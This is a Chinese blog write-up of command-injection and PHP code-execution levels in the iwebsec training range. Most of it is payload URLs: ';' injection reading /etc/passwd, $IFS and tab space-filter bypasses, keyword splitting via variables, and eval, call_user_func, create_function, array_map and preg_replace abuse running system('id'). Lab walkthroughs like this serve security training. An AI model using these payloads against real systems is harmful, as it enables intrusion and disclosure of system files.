文章总结： 该文档记录了iwebsec靶场中命令执行与代码执行漏洞的实战演练，涵盖Linux命令注入绕过技巧（如分号分隔、$IFS空格绕过、变量拼接）及PHP可变函数、eval、calluserfunc等函数导致的代码执行漏洞，通过具体案例演示漏洞利用方法，为Web安全测试提供实操参考。 综合评分： 70 文章分类： WEB安全,代码审计,漏洞分析,实战经验,安全培训

iwebsec靶场，文件执行+命令执行

熵减花园

2026年5月19日 16:39 河北

在小说阅读器读本章

去阅读

1、Linux下的命令执行漏洞

url：/exec/01.php?ip=127.0.0.1

/exec/01.php?ip=127.0.0.1;ifconfig

exec/01.php?ip=127.0.0.1;cat /etc/passwd

2、命令执行绕过

/exec/02.php?ip=127.0.0.1

/exec/02.php?ip=127.0.0.1;ifconfig

/exec/02.php?ip=127.0.0.1;cat /etc/passwd

报错

查看源码

/exec/02.php?ip=127.0.0.1;cat$IFS/etc/passwd

/exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

/exec/02.php?ip=127.0.0.1;cat%09/etc/passwd

3.2命令执行漏洞关键字命令绕过

查看源码，对关键字cat绕过

/exec/03.php?ip=127.0.0.1;a=c;b=at;$a$b /etc/passwd

1、可变函数漏洞示例01

查看源码

/execcode/09.php?func=func1

调用phpinfo()函数

2、示例2

/execcode/10.php?func=func3&arg=123

/execcode/10.php?func=system&arg=id

3、eval函数

查看源码

使用hackbar

1=echo 123;phpinfo();

4、call_user_func函数

查看源码

fun=system&arg=id;

5、create_function函数

查看源码

/execcode/05.php?id=1;}phpinfo();/*

5、array_map()函数：

/execcode/06.php?func=system&argv=id

6、preg_replace()函数：

/execcode/08.php?name=phpinfo()

如有侵权，请联系删除。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：熵减花园 《iwebsec靶场，文件执行+命令执行》